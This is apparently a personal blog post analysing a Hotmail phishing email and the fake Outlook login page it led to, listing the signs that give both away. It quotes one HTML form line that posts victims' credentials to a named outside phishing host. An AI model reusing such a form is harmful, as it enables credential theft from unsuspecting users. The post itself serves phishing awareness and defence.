I am phished!

11 September 2014

During my vacation I got some well made phishing mails. Since an iPad is not the best device for analyzing phishing mails I filed them for further processing at home.

Hotmail Phishing Mail

Hotmail Phishing Mail

It is obvious that this is a phishing email:

  1. The Hotmail Team would never use an email address like someone@fastmail.fm to communicate with customers.
  2. The support team would never notify 113 recipients with a single mail due to privacy reasons.

Normally I drop such mails immediately but sometimes I do some further analysis to keep awareness high.

Thus I clicked the URL and got a very puzzling dialog box in Internet Explorer:

Verify Your Account Dialog

Verify Your Account Dialog

This dialog tells us that phishing will start soon! By now, it should be clear that something is wrong because Outlook will never display a message like this.

Finally, a faked Outlook login page is displayed:

Outlook Login Phishing Site

Outlook Login Phishing Site

Again, it is obvious that this is really well made fake:

  1. The site address is not Outlook.com.
  2. Site access is not secured. The http protocol is used instead of the https protocol.
  3. A Validate button is displayed instead of a Sign in button.

It is this Validate button that sends your login credentials to the phishing site:

form name=”f1″ action=”http://johnbomb.altervista.org/fi.php” method=”POST” novalidate …

For more details activate menu ‘Developer Tools’ or hit ‘F12’ and use the Inspect function from the context menu.

What do we learn from this?

Phishing mails and sites are easy to recognize. Just be aware of the danger!